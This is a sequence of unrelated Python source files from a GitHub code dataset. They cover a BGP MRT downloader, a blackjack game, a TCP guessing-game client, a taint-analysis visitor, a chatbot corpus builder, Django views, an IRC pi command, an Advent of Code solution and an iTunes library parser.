measure time / get intervals / get time_epoch\n\t\tself.TT = Time_Tool( P = self.P )\n\n\t\t#Interface to ElasticSearch : download / upload routes, withdrawals, stats and state change messages\n\t\tself.ESI = ES_Interface( P = self.P, include_state_change = False, include_withdraw = False, include_route = False, include_stats = False )\n\n\t\t#Interface to RouteViews, RIPE and ElasticSearch : index, delete, download and modify MRT files from RouteViews and RIPE RRCs\n\t\tself.MRTI = MRT_Interface( P = self.P, ESI = self.ESI )\n\n\tdef run( self ):\n\t\tself.P.write(\"------------------------------------------------------------\")\n\t\tRRC_number = self.AT.ask( question = \"RRC_number:\", expect_int = True )\n\t\tself.P.write( \"RRC_number is \" + str(RRC_number) )\n\n\t\t#Get time interval\n\t\ttime_interval = self.TT.get_time_interval( time_start_str = \"2018-01-01\", time_end_str = \"2018-01-01 08:00:00\" )\n\t\tself.P.write( \"time_interval is \" + str(time_interval) )\n\n\t\t#Retrieve download paths of MRT files from ElasticSearch index bgp-links\n\t\tdownload_paths = self.MRTI.get_download_paths( RRC_number = RRC_number, time_interval = time_interval )\n\t\t\n\t\tif len( download_paths ) == 0:\n\t\t\tself.P.write( \"Download_MRT_Files: run: len( download_paths ) == 0\", color = 'red' )\n\t\t\treturn\n\n\t\tself.P.write( \"found the following download_paths:\" )\n\t\tfor download_path in download_paths:\n\t\t\tself.P.write( \"\\t\" + download_path )\n\t\t\t\n\t\t#Select first download path in list\n\t\tdownload_path = download_paths[0]\n\t\tself.P.write( \"download path \" + str(download_path) )\n\n\t\t#Download MRT records\n\t\trecords = self.MRTI.download_MRT_records( download_path = download_path )\n\n\t\t#Print MRT records\n\t\tfor record in records:\n\t\t\tself.P.write( \"Show next record?\" )\n\t\t\tif self.ARST.ask_are_you_sure() is False:\n\t\t\t\tbreak\n\n\t\t\tdata_JSON = self.MRTI.get_data_JSON( record = record )\n\t\t\tself.P.write( \"Raw Data\", color = 'green' )\n\t\t\tself.P.write_JSON( data_JSON = data_JSON )\n\n\t\t\tif self.MRTI.is_update_record( record = record ):\n\t\t\t\troutes = self.MRTI.get_update_routes( record = record )\n\t\t\t\t\n\t\t\t\tself.P.write( \"Processed Data\", color = 'green' )\n\t\t\t\tfor route in routes:\n\t\t\t\t\tself.P.write_JSON( data_JSON = route )\n\n\t\t\telif self.MRTI.is_RIB_record( record = record ) is True:\n\t\t\t\troutes = self.MRTI.get_RIB_routes( record = record )\n\t\t\t\t\n\t\t\t\tself.P.write( \"Processed Data\", color = 'green' )\n\t\t\t\tfor route in routes:\n\t\t\t\t\tself.P.write_JSON( data_JSON = route )\n\nDownload_MRT_Files().run()\n","repo_name":"asemwal/thesis-project","sub_path":"bgp-python/examples/executables/run_download_MRT_files.py","file_name":"run_download_MRT_files.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6620362893","text":"from PyQt5.QtWidgets import QApplication, QDialog, QProgressBar, QVBoxLayout, QProgressDialog\nimport time\n\nclass Example(QDialog):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.progress = QProgressBar(self)\n self.progress.setMinimum(0)\n self.progress.setMaximum(0)\n vbox = QVBoxLayout()\n vbox.addWidget(self.progress)\n self.setLayout(vbox)\n self.setGeometry(300, 300, 250, 150)\n self.show()\n\n def run(self):\n dialog = QProgressDialog(self)\n dialog.setLabelText(\"Loading...\")\n dialog.setRange(0, 100) # determinate 0-100 range so the setValue() calls below are shown\n 
dialog.show()\n        for i in range(101):\n            time.sleep(0.1) # simulate the progress of a running task\n            dialog.setValue(i)\n        dialog.close()\n\nif __name__ == '__main__':\n    app = QApplication([])\n    ex = Example()\n    ex.run()\n    app.exec_()","repo_name":"Tino-25/DACN2_ComputerVision","sub_path":"ComputerVision_background_desktop/test_show_loading.py","file_name":"test_show_loading.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29159870203","text":"import socket\r\nimport time\r\nimport protocol\r\n\r\n\r\ndef wczytaj_liczbe():\r\n    while True:\r\n        num_l = input('Podaj nieparzysta liczbe <= 255: ')\r\n        if num_l.isdigit() == True:\r\n            num_l = int(num_l)\r\n            if num_l % 2 == 1:\r\n                return num_l\r\n            else:\r\n                continue\r\n        else:\r\n            print(\"Zly format danych!\")\r\n\r\n\r\nHOST = '127.0.0.1' #Server IP address\r\nPORT = 65432 #Port used by the server\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\nwhile True: # Client waits until the server is available + exception handling\r\n    try:\r\n        s.connect((HOST, PORT))\r\n        break\r\n    except ConnectionRefusedError:\r\n        print(\"...\")\r\n        time.sleep(5)\r\n\r\ntry:\r\n    print(\"Wysylam zadanie wejscia na serwer\")\r\n    messagesend = protocol.dataencode(0, 1, 0, 0, 0)\r\n    s.send(messagesend)\r\n    messagereceive = s.recv(1024)\r\n    decodemessagereceive = protocol.datadecode(messagereceive)\r\n\r\n    if decodemessagereceive['operation'] == 0 and decodemessagereceive['answer'] == 0:\r\n        id = protocol.d['id']\r\n        print(\"Otrzymane id: {}\".format(id))\r\n        while True:\r\n            num_l = wczytaj_liczbe() # using the wczytaj_liczbe() function\r\n            if num_l <= 255:\r\n                break\r\n            else:\r\n                print(\"Niepoprawna liczba!\")\r\n        messagesend = protocol.dataencode(1, 0, id, num_l, 0)\r\n        s.send(messagesend)\r\n        print(\"Wyslano wiadomosc z liczba prob \")\r\n        messagereceive = s.recv(1024)\r\n        decodemessagereceive = protocol.datadecode(messagereceive)\r\n\r\n        if decodemessagereceive['operation'] == 1 and decodemessagereceive['answer'] == 1:\r\n            liczba_prob = protocol.d['number']\r\n            print(\"Liczba prob: {}\".format(liczba_prob))\r\n            print(\"Zakres tajnej liczby <1,25>\")\r\n            while liczba_prob > 0: # Game loop\r\n                try:\r\n                    while True:\r\n                        num_s = int(input('Podaj liczbe <= 255: '))\r\n                        if num_s <=255:\r\n                            break\r\n                        else:\r\n                            print(\"Niepoprawna liczba!\")\r\n                    messagesend = protocol.dataencode(2, 0, id, num_s, 0)\r\n                    s.send(messagesend)\r\n                    messagereceive = s.recv(1024)\r\n                    decodemessagereceive = protocol.datadecode(messagereceive)\r\n                    if decodemessagereceive['operation'] == 2 and decodemessagereceive['answer'] == 1:\r\n                        liczba_prob -= 1\r\n                        print(\"Nie trafiles, proboj dalej. Pozostalo {} prob!\".format(liczba_prob))\r\n                    elif decodemessagereceive['operation'] == 2 and decodemessagereceive['answer'] == 2:\r\n                        print(\"Trafiles! \")\r\n                        break\r\n                    elif decodemessagereceive['operation'] == 2 and decodemessagereceive['answer'] == 3:\r\n                        print(\"Przegrales, przeciwnik byl szybszy! \")\r\n                        break\r\n                except ConnectionResetError:\r\n                    print(\"Nastapilo rozlaczenie! \")\r\n                    break\r\n\r\n    else:\r\n        print(\"Nie mozna uzyskac id\")\r\n\r\nexcept ConnectionResetError:\r\n    print(\"Nastapilo rozlaczenie! \")\r\nprint(\"Koniec Gry! 
\")","repo_name":"Tarnac/TS_TCP_Binary_Client-Server","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24730155738","text":"import random, copy, time\ncard_Deck = {'A': '1', 'A': '11', '2': '2', '3': '3', '4': '4', '5': '5', '6': '6',\n '7': '7', '8': '8', '9': '9', '10': '10', 'J': '10',\n 'Q': '10', 'K': '10'}\nprint(\"Welcome to BLACKJACK!\\n\\n\")\ntime.sleep(1.5)\nprint(\"Attempt to beat the dealer by getting as close to 21 as possible, without going over.\\n\")\ntime.sleep(3)\n\n#players turn\nloop_One = True\nloop_Two = True\nloop_Three = True\nwhile loop_One:\n player_Cards = []\n player_Score = []\n dealer_Cards = []\n dealer_Score = []\n did_Player_Bust = False\n did_Dealer_Bust = False\n player_Cards.append(random.choice(list(card_Deck)))\n player_Cards.append(random.choice(list(card_Deck)))\n dealer_Cards.append(random.choice(list(card_Deck)))\n dealer_Cards.append(random.choice(list(card_Deck)))\n print(\"You are dealt two cards face down, that only you can see.\\nThe dealer is also dealt two cards.\\nOne of the dealer's cards was dealt face up.\\n\\n\")\n time.sleep(3)\n while loop_Two:\n print('The cards you have are: ' + str(player_Cards) + '.')\n time.sleep(3)\n player_Score.clear()\n for cards in player_Cards:\n player_Score.append(int(card_Deck.get(cards, 0)))\n for x in range(0, len(player_Score)):\n player_Score[x] = int(player_Score[x])\n player_Score_Sum = sum(player_Score)\n print(\"Your card's total points are: \" + str(player_Score_Sum) + \".\\n\")\n time.sleep(3)\n print(\"The dealer has a ['\" + dealer_Cards[0] + \"'] showing.\")\n while loop_Three:\n if player_Cards == ['A', 'K'] or player_Cards == ['A', 'Q'] or player_Cards == ['A', 'J'] or player_Cards == ['A', '10'] or player_Cards == ['K', 'A'] or player_Cards == ['Q', 'A'] or player_Cards == ['J', 'A'] or player_Cards == ['10', 'A']:\n time.sleep(2)\n loop_One = False\n loop_Two = False\n loop_Three = False\n if player_Score_Sum >= 22:\n print('Bust!')\n did_Player_Bust = True\n time.sleep(2)\n print('\\nThe dealer reveals his cards.\\n')\n time.sleep(2)\n loop_One = False\n loop_Two = False\n loop_Three = False\n if player_Score == 21:\n time.sleep(2)\n print('\\nThe dealer reveals his cards.\\n')\n time.sleep(2)\n loop_One = False\n loop_Two = False\n loop_Three = False\n if player_Score_Sum <= 21:\n player_Choice = input('Do you want another card?\\n')\n if player_Choice == 'y':\n player_Cards.append(random.choice(list(card_Deck)))\n print('\\nYou hit!\\n')\n print('The cards you have are: ' + str(player_Cards) + '.')\n time.sleep(3)\n player_Score.clear()\n for cards in player_Cards:\n player_Score.append(int(card_Deck.get(cards, 0)))\n for x in range(0, len(player_Score)):\n player_Score[x] = int(player_Score[x])\n player_Score_Sum = sum(player_Score)\n print(\"Your card's total points are: \" + str(player_Score_Sum) + \".\\n\")\n continue\n elif player_Choice == 'n':\n time.sleep(2)\n print('\\nThe dealer reveals his cards.\\n')\n time.sleep(2)\n loop_One = False\n loop_Two = False\n loop_Three = False\n else:\n print(\"Enter 'y' for yes or 'n' for no.\")\n continue\n #dealers turn\n print('The cards the dealer has are: ' + str(dealer_Cards))\n dealer_Score.clear()\n for cards in dealer_Cards:\n dealer_Score.append(int(card_Deck.get(cards, 0)))\n for x in range(0, len(dealer_Score)):\n dealer_Score[x] = int(dealer_Score[x])\n dealer_Score_Sum = 
sum(dealer_Score)\n time.sleep(1)\n print(\"The dealer's card's points are: \" + str(dealer_Score_Sum))\n\n #dealers turn (hit or stay)\n while True:\n if did_Player_Bust == True:\n break\n if int(dealer_Score_Sum) < 17:\n dealer_Cards.append(random.choice(list(card_Deck)))\n time.sleep(2)\n print('The dealer hits!\\n')\n print('The cards the dealer has are: ' + str(dealer_Cards))\n dealer_Score.clear()\n for cards in dealer_Cards:\n dealer_Score.append(int(card_Deck.get(cards, 0)))\n for x in range(0, len(dealer_Score)):\n dealer_Score[x] = int(dealer_Score[x])\n dealer_Score_Sum = sum(dealer_Score)\n print(\"The dealer's card's points are: \" + str(dealer_Score_Sum))\n continue\n if int(dealer_Score_Sum) > 21:\n did_Dealer_Bust = True\n break\n else:\n break\n\n #results\n time.sleep(3)\n if player_Cards == ['A', 'K'] or player_Cards == ['A', 'Q'] or player_Cards == ['A', 'J'] or player_Cards == ['A', '10'] or player_Cards == ['K', 'A'] or player_Cards == ['Q', 'A'] or player_Cards == ['J', 'A'] or player_Cards == ['10', 'A']:\n print('Blackjack!\\nYou won!')\n if did_Player_Bust == True:\n print('You lost!')\n if did_Player_Bust == False and did_Dealer_Bust == True:\n print('The dealer folded!\\nYou won!')\n else:\n if player_Score_Sum < dealer_Score_Sum:\n print('You lost!')\n if player_Score_Sum > dealer_Score_Sum and did_Player_Bust == False:\n print('You won!')\n if player_Score_Sum == dealer_Score_Sum:\n print(\"It's a push!\")\n\n #replay\n time.sleep(3)\n replay = input('\\nDo you want to play again?\\n')\n if replay == 'y':\n player_Cards.clear()\n dealer_Cards.clear()\n player_Score.clear()\n dealer_Score.clear()\n player_Score_Sum = 0\n dealer_Score_Sum = 0\n loop_One = True\n loop_Two = True\n loop_Three = True\n print('\\n\\n\\n')\n continue\n if replay == 'n':\n break\n","repo_name":"dosbern/Blackjack_Game","sub_path":"Blackjack_Game/Blackjack_Game.py","file_name":"Blackjack_Game.py","file_ext":"py","file_size_in_byte":6249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18749438475","text":"from visitors import Visitor\nfrom utilities import GreekLetters\nfrom instantiation_visitor import FlowCategory, CallArgKeys as InstantiationCallArgKeys\n\n\nclass TaintQualifer:\n TAINTED = \"tainted\"\n UNTAINTED = \"untainted\"\n labels = GreekLetters.greek_letters_lowercase\n\n\nclass CallArgKeys(InstantiationCallArgKeys):\n Call_arg_TaintQualifer = \"Call_arg_TaintQualifier\"\n\n\nclass TaintedFlowVisitor(Visitor):\n\n def __init__(self, ast):\n super(TaintedFlowVisitor, self).__init__(ast)\n self.super = super(TaintedFlowVisitor, self)\n self._labels = filter(None, TaintQualifer.labels)\n self._labels_map = dict()\n self.sources = list()\n self.sinks = list()\n self.sanitizers = list()\n\n @property\n def labels(self):\n return self._labels_map\n\n def next_label(self):\n next_greek_letter = next(self._labels)\n greek_letters_list = list(GreekLetters.greek_letters_lowercase)\n greek_letters_list.remove(next_greek_letter)\n GreekLetters.greek_letters_lowercase = tuple(greek_letters_list)\n return next_greek_letter\n\n def check_for_Call_arg(self, node):\n if CallArgKeys.Call_arg in node and CallArgKeys.Call_arg_CallFlowCategory in node:\n arg_flow_category = node.pop(CallArgKeys.Call_arg_CallFlowCategory)\n node[CallArgKeys.Call_arg_TaintQualifer] = {\n FlowCategory.SOURCE: TaintQualifer.TAINTED,\n FlowCategory.SANITIZER: TaintQualifer.TAINTED,\n FlowCategory.REGULAR: TaintQualifer.TAINTED,\n FlowCategory.SINK: 
TaintQualifer.UNTAINTED\n }[arg_flow_category]\n taint_qualifier = self.next_label()\n\n self._labels_map[node[CallArgKeys.Call_arg]\n ] = taint_qualifier\n\n def assign_taint_qualifier(self, node, name):\n if not name in self._labels_map:\n node_flow_category = node[FlowCategory.__name__]\n\n if node_flow_category == FlowCategory.SOURCE:\n self.sources.append(name)\n # taint_qualifier = TaintQualifer.TAINTED\n\n elif node_flow_category == FlowCategory.SANITIZER:\n self.sanitizers.append(name)\n # taint_qualifier = TaintQualifer.UNTAINTED\n\n elif node_flow_category == FlowCategory.SINK:\n self.sinks.append(name)\n # taint_qualifier = TaintQualifer.UNTAINTED\n\n # elif node_flow_category == FlowCategory.REGULAR:\n taint_qualifier = self.next_label()\n\n self._labels_map[name] = taint_qualifier\n\n node[TaintQualifer.__name__] = self._labels_map[name]\n\n def visit_Name(self, node):\n name = self.super.visit_Name(node)\n self.assign_taint_qualifier(node, name)\n\n def visit_Call_args(self, nodes):\n for node in nodes:\n self.check_for_Call_arg(node)\n self.super.visit_Call_args(nodes)\n\n def visit_BinOp(self, node):\n self.check_for_Call_arg(node)\n self.super.visit_BinOp(node)\n\n def check_for_Call_arg_CallFlowCategory(self, node):\n if CallArgKeys.Call_arg_CallFlowCategory in node:\n del node[CallArgKeys.Call_arg_CallFlowCategory]\n\n def visit_Constant(self, node):\n node[TaintQualifer.__name__] = TaintQualifer.UNTAINTED\n self.check_for_Call_arg(node)\n self.check_for_Call_arg_CallFlowCategory(node)\n","repo_name":"vvasylkovskyi/SW-Security-Static-Analysis-Tool","sub_path":"tf_visitor.py","file_name":"tf_visitor.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27755149598","text":"with open(\"./test.txt\") as file_object:\n contents = file_object.read()\n print(contents.strip())\n\nwith open(\"./test.txt\") as file_content:\n '''\n This will read line by line\n '''\n for line in file_content:\n # print like this will result in extra empty line between lines, so in order to remove that line we can do\n # print(line)\n print(line.strip('\\n'))\n\n# read birthday in pi\nwith open(\"./pi_one_million.txt\") as file_content:\n contents = file_content.read()\n my_birthday = \"19900904\"\n if my_birthday in contents:\n print(\"my birthday is in pi\")\n else:\n print(\"my birthday is not in pi\")\n\ntry:\n with open(\"./test_fail.txt\") as file_object:\n '''\n This will raise error as file not find\n '''\n contents = file_object.read()\n print(contents.strip())\nexcept Exception:\n print(\"no such file\")\n","repo_name":"ericwang094/python_notes","sub_path":"python_intro/io/python_io.py","file_name":"python_io.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5068461543","text":"from typing import List, Union, Tuple, NamedTuple, Optional\n\nfrom collections import deque\n\nimport re\n\n\n# class Rule(NamedTuple):\n# num: int\n# value: Union[int, str]\n\n\nRuleSet = List[List[List[Union[int, str]]]]\n\n\ndef parse_input(file: str) -> Tuple[RuleSet, List[str]]:\n with open(file, 'r') as f:\n raw = f.read()\n split_raw = raw.split('\\n\\n')\n num_rules = len(split_raw[0].split('\\n'))\n rules: RuleSet = [[] for _ in range(num_rules)]\n\n # rules\n for rule in split_raw[0].split('\\n'):\n rule = rule.strip()\n num_rule = int(re.findall(r'\\d+', rule)[0])\n if \"|\" in rule:\n try:\n 
first_set: List[int] = [int(num) for num in rule.split(\":\")[1].split(\"|\")[0].split()]\n rules[num_rule].append(first_set)\n second_set: List[int] = [int(num) for num in rule.split(\":\")[1].split(\"|\")[1].split()]\n rules[num_rule].append(second_set)\n except IndexError:\n rules[num_rule].append(first_set) # no second set\n elif ('\"a\"' in rule) or ('\"b\"' in rule):\n first_set: str = rule.split(\":\")[1].split()[0].strip('\"')\n rules[num_rule].append([first_set])\n else:\n first_set: List[int] = [int(num) for num in rule.split(\":\")[1].split()]\n rules[num_rule].append(first_set)\n\n # received messages\n messages = [msg.strip() for msg in split_raw[1].split('\\n')]\n return rules, messages\n\n\n#rules, messages = parse_input('data/day19_test2')\n\ndef crawl(rules:RuleSet, rule_to_check: int = 0) -> List[str]:\n res = []\n if rules[rule_to_check][0][0] == 'b':\n return ['b']\n elif rules[rule_to_check][0][0] == 'a':\n return ['a']\n\n for rule in rules[rule_to_check]:\n if len(rule) == 1:\n res += crawl(rules, rule[0])\n elif len(rule) == 2: # this is not a general solution! (we could have 4 length rule or more)\n option1 = crawl(rules, rule[0])\n option2 = crawl(rules, rule[1])\n res += [x + y for x in option1 for y in option2]\n elif len(rule) == 3:\n option1 = crawl(rules, rule[0])\n option2 = crawl(rules, rule[1])\n option3 = crawl(rules, rule[2])\n res += [x + y + z for x in option1 for y in option2 for z in option3]\n\n return res\n\n\n#possibilities = crawl(rules, 0)\n\n# for test\n# assert len([item for item in messages if item in possibilities]) == 2\n\n#print(len([item for item in messages if item in possibilities]))\n\n## Part 2 ##\n\nclass Rule(NamedTuple):\n value: int\n char: Optional[str] = None\n\n\ndef parse_input2(file: str) -> Tuple[RuleSet, List[str]]:\n with open(file, 'r') as f:\n raw = f.read()\n split_raw = raw.split('\\n\\n')\n num_rules = len(split_raw[0].split('\\n'))\n rules: RuleSet = [[] for _ in range(num_rules)]\n\n # rules\n for rule in split_raw[0].split('\\n'):\n rule = rule.strip()\n num_rule = int(re.findall(r'\\d+', rule)[0])\n # replacing section\n if num_rule == 8:\n rule = \"8: 42 | 42 8\"\n elif num_rule == 11:\n rule = \"11: 42 31 | 42 11 31\"\n\n if \"|\" in rule:\n try:\n first_set: List[Rule] = [Rule(int(num)) for num in rule.split(\":\")[1].split(\"|\")[0].split()]\n rules[num_rule].append(first_set)\n second_set: List[Rule] = [Rule(int(num)) for num in rule.split(\":\")[1].split(\"|\")[1].split()]\n rules[num_rule].append(second_set)\n except IndexError:\n rules[num_rule].append(first_set) # no second set\n elif ('\"a\"' in rule) or ('\"b\"' in rule):\n first_set: str = rule.split(\":\")[1].split()[0].strip('\"')\n rules[num_rule].append([Rule(num_rule, first_set)])\n else:\n first_set: List[Rule] = [Rule(int(num)) for num in rule.split(\":\")[1].split()]\n rules[num_rule].append(first_set)\n\n # received messages\n messages = [msg.strip() for msg in split_raw[1].split('\\n')]\n return rules, messages\n\n\nrules, messages = parse_input2('data/day19_test')\n#possibilities = crawl(rules, 0)\n\n\"\"\"\nGenerating all the possibilities won't work here (because of loops).\nWe have to check each message against the rules. 
I got help from other\nsolutions.\n\"\"\"\ndef check(s: str, rules: List[List[List[Rule]]]) -> bool:\n \"\"\"\n Returns True if s is valid for rules[0].\n \"\"\"\n q = deque([(s, [Rule(0)])])\n\n while q:\n s, rule_ids = q.popleft()\n\n if not s and not rule_ids:\n return True\n elif not s or not rule_ids:\n continue\n elif len(rule_ids) > len(s): # each rule can only match 1 character\n continue\n\n rule = rules[rule_ids[0].value][0][0]\n rule_ids = rule_ids[1:]\n\n if rule.char and s[0] == rule.char:\n q.append((s[1:], rule_ids))\n elif rule.char and not rule_ids:\n continue\n else:\n for subrule_ids in rules[rule.value]:\n q.append((s, subrule_ids + rule_ids))\n return False\n\nvalid = 0\nfor i, s in enumerate(messages):\n print(i, s)\n if check(s, rules):\n valid += 1\n\nprint(valid)","repo_name":"oren0e/aoc-2020","sub_path":"day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10692818540","text":"import torch\n\nfrom const import *\n\n\ndef reps2idx(responses, word2idx):\n return [[word2idx[w] if w in word2idx else UNK for w in rep] for rep in responses]\n\n\ndef uttes2idx(utterances, word2idx):\n return [[[word2idx[w] if w in word2idx else UNK for w in u] for u in utte] for utte in utterances]\n\n\nclass Dictionary(object):\n def __init__(self):\n self.word2idx = {\n WORD[PAD]: PAD,\n WORD[UNK]: UNK,\n }\n self.idx = len(self.word2idx)\n\n def add(self, word):\n if self.word2idx.get(word) is None:\n self.word2idx[word] = self.idx\n self.idx += 1\n\n def __call__(self, utterances, responses, min_count):\n words = [word for resp in responses for word in resp]\n words += [word for utte in utterances for u in utte for word in u]\n\n word_count = {w: 0 for w in set(words)}\n for w in words:\n word_count[w] += 1\n\n ignored_word_count = 0\n for word, count in word_count.items():\n if count <= min_count:\n ignored_word_count += 1\n continue\n self.add(word)\n\n return ignored_word_count\n\n def __len__(self):\n return self.idx\n\n def __str__(self):\n return \"%s(size = %d)\".format(self.__class__.__name__, len(self.idx))\n\n\nclass Corpus(object):\n def __init__(self, max_cont_len=10, max_utte_len=50, min_word_count=2):\n self.dict = Dictionary()\n self.max_cont_len = max_cont_len\n self.max_utte_len = max_utte_len\n self.min_word_count = min_word_count\n\n self.parse_data(\"data/dev.txt\", False)\n self.parse_data(\"data/train.txt\", True)\n self.save()\n\n def parse_data(self, inf, is_train):\n utterances, responses, labels = [], [], []\n\n for line in open(inf):\n contexts = line.strip().split(\"\\t\")\n uttes, resp, l = contexts[1:-1], contexts[-1], contexts[0]\n\n resp = resp.split()\n uttes = [utte.split() for utte in uttes]\n\n if len(resp) > self.max_utte_len:\n resp = resp[:self.max_utte_len]\n\n if len(uttes) > self.max_cont_len:\n # close to response\n uttes = uttes[-self.max_cont_len:]\n\n for index, utte in enumerate(uttes):\n if len(utte) > self.max_utte_len:\n uttes[index] = utte[:self.max_utte_len]\n\n utterances.append(uttes)\n responses.append(resp)\n labels.append(int(l))\n\n if is_train:\n ignore_w_nums = self.dict(\n utterances, responses, self.min_word_count)\n self.train_utterances = utterances\n self.train_responses = responses\n self.train_labels = labels\n\n print(\"Ignored counts - [{}]\".format(ignore_w_nums))\n\n else:\n self.test_utterances = utterances\n self.test_responses = responses\n self.test_labels = labels\n\n def 
save(self):\n        data = {\n            'max_cont_len': self.max_cont_len,\n            'max_utte_len': self.max_utte_len,\n            'dict': {\n                'dict': self.dict.word2idx,\n                'dict_size': len(self.dict),\n            },\n            'train': {\n                'responses': reps2idx(self.train_responses, self.dict.word2idx),\n                'utterances': uttes2idx(self.train_utterances, self.dict.word2idx),\n                'labels': self.train_labels\n            },\n            'test': {\n                'responses': reps2idx(self.test_responses, self.dict.word2idx),\n                'utterances': uttes2idx(self.test_utterances, self.dict.word2idx),\n                'labels': self.test_labels\n            }\n        }\n\n        torch.save(data, \"data/corpus\")\n        print('dict length - [{}]'.format(len(self.dict)))\n\n\nif __name__ == \"__main__\":\n    Corpus()\n","repo_name":"ne7ermore/torch-light","sub_path":"retrieval-based-chatbots/corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":526,"dataset":"github-code","pt":"52"} +{"seq_id":"43130640923","text":"from votes.models import Project, People, Votes\nfrom django.shortcuts import render, get_object_or_404, get_list_or_404\nfrom django.template import Context, Template, RequestContext, loader\n\nfrom pydoc import help\nfrom scipy.stats.stats import pearsonr\n\ndef index(request):\n\tpeople_all=People.objects.all()\n\tcontext = {'latest_Votes_list': people_all}\n\treturn render(request, 'votes/index.html', context)\n\ndef detail(request, votes_id):\n\tpeople = get_object_or_404(People, pk=votes_id)\n\treturn render(request, 'votes/re.html', {'people': people})\n\ndef details(request, votes_id):\n\tvotess_id=int(str(votes_id))-1\n\tcontext={'vot': Votes.objects.filter(ppid=votess_id), 'ppl':People.objects.all(), 'proj':Project.objects.all(),}\n\treturn render(request, 'votes/details.html', context )\n\ndef result(request, votes_id):\n\tvotess_id=int(str(votes_id))\n\tup={}\n\tud={}\n\tv=[]\n\tu=[]\n\tp=People.objects.all()\n\tfor i in p:\n\t\tif len(Votes.objects.filter(ppid=i.id, vote=-1))!=0:\n\t\t\tv.append((i.id,round(float(len(Votes.objects.filter(ppid=i.id, vote=1)))/float(len(Votes.objects.filter(ppid=i.id, vote=-1))),3)))\n\tu1=sorted(v,key=lambda x: x[1])\n\tpo=0\n\tfor i in u1:\n\t\tif i[0]==votess_id :\n\t\t\tpos=po+1\n\t\tpo=po+1\n\tu2=u1[pos-5:6+pos]\n\tfor i in u2:\n\t\tif i[0]!=votess_id :\n\t\t\tu.append(i[0])\n\tab=[]\n\tfor l in u:\n\t\t#k=People.objects.get(id=l).id\n\t\tfor j in Votes.objects.filter(ppid=int(str(l))):\n\t\t\tif j.pid not in ab:\n\t\t\t\tab.append(j.pid)\n\t\n\tcontext ={'ab': ab, 'p': People.objects.get(id=votess_id),'peop': People.objects.all(), 'l': u}\n\treturn render(request, 'votes/results.html', context)\n","repo_name":"meow333/recommendation-engine","sub_path":"pv1/votes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70237126566","text":"__author__ = 'flipvanrijn'\n\nimport urllib\n\ndef command_pi(bot, reply, args):\n    \"\"\"\n    Returns pi with a precision that can be specified. 
Maximum precision is 500 decimal places.\n    .pi \n    \"\"\"\n\n    arg = args.split(' ')[0]\n\n    if not arg:\n        bot.msg(reply, 'Een nauwkeurigheid is vereist.')\n    else:\n        if not arg.isdigit():\n            bot.msg(reply, 'I see what you did there!')\n        elif int(arg) == 0:\n            bot.msg(reply, '4')\n        elif int(arg) > 500:\n            bot.msg(reply, 'Maximale nauwkeurigheid is 500 decimalen.')\n        else:\n            fp = urllib.urlopen('http://www.angio.net/pi/digits/10000.txt')\n            pi = fp.readline()[0:2+int(arg)]\n            bot.msg(reply, pi)\n            fp.close()","repo_name":"flipvrijn/kirubot","sub_path":"modules/module_pi.py","file_name":"module_pi.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"30597489592","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTool to get any information about iTunes tracks and playlists quickly and easily.\nMickael \nMIT License\n\"\"\"\n\nimport xml.etree.ElementTree as ET\nfrom urllib.parse import unquote, urlparse\n\n\ndef lib_init():\n    \"\"\"Initialize the library, must be called at the very beginning\"\"\"\n    lib_class = Library()\n    return lib_class\n\n\nclass Library(object):\n    def __init__(self):\n        \"\"\"Constructor\"\"\"\n        self.lib = 0\n        self.complete_playlist = []\n        self.track_attr_list = []\n    \n\n    def parse(self, path_to_XML_file):\n        \"\"\"Reads xml file and generate tracks list\"\"\"\n        tree = ET.parse(path_to_XML_file)\n        self.lib = tree.getroot()\n        self.read_tracks()\n    \n    \n    def get_playlist_list(self):\n        \"\"\"Creates playlists list\"\"\"\n        main_dict = self.lib.findall('dict')\n        \n        sub_array=main_dict[0].findall('array')\n        sub_array_childrens = list(sub_array[0])\n        \n        # For each playlist\n        playlist_name_list = []\n        for array in sub_array_childrens:\n            playlist = list(array)\n            \n            # Save name of playlists\n            for i in range(len(playlist)):\n                if playlist[i].text == \"Name\":\n                    playlist_name_list.append(playlist[i+1].text)\n                    cur_playlist_name = playlist[i+1].text\n            \n            \n            # Get tracks\n            if playlist[i].tag == \"array\":\n                sub_array = list(playlist[i])\n                \n                for k in range(len(sub_array)):\n                    track_tags = list(sub_array[k])\n                    \n                    self.complete_playlist.append([cur_playlist_name, \n                                                   track_tags[1].text])\n                    \n        return playlist_name_list\n    \n    \n    def get_track_list(self):\n        \"\"\"Returns tracks list\"\"\"\n        return self.track_attr_list\n    \n    def read_tracks(self):\n        \"\"\"Generate tracks list\"\"\"\n        attribut_name_list = [\"Track ID\", \"Size\", \"Total Time\", \"Date Modified\", \n                              \"Date Added\", \"Bit Rate\", \"Sample Rate\", \"Play Count\", \n                              \"Play Date\", \"Play Date UTC\", \"Skip Count\", \"Skip Date\", \n                              \"Rating\", \"Album Rating\", \"Persistent ID\", \"Track Type\",\n   